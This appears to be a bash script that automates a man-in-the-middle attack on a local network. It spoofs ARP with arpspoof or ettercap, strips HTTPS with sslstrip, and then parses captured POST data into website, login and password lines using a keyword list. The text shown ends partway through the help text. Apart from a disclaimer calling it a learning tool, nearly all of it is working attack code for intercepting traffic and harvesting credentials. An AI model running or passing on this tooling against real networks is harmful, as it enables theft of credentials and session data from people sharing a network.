# #!

/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
version="20130313"
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi

log_output_dir=~
sslstrip_dir=/pentest/web/sslstrip
ask_for_install=y

if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi

# if user ^C then execute cleanup function

trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it
may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi

if [[ $sslstripid != "" ]];then

kill $sslstripid
fi

if [[ $dnsid != "" ]];then

kill $dnsid
fi

if [[ $etterspoofid != "" ]];then

kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then

killall ettercap
else
killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding

iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain

echo -e "\033[32m[-] Clean up successful !\033[m"

exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e
"credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsess
ion\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i;
print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
exit 0 ;;

-pl) while :
do
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i;
print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
sleep 3
done ;;

-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."

etter="1"
shift
sleep 0.5 ;;

-h | --help) clear
echo -e "You are running $0, version $version.

usage : $0 -h -c -p -e -s -f
 -h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : Stealth mode. The script won't download anything.
-f : Use a padlock favicon in sslstrip.

\033[31m DISCLAIMER :\033[m

This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m

This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. Th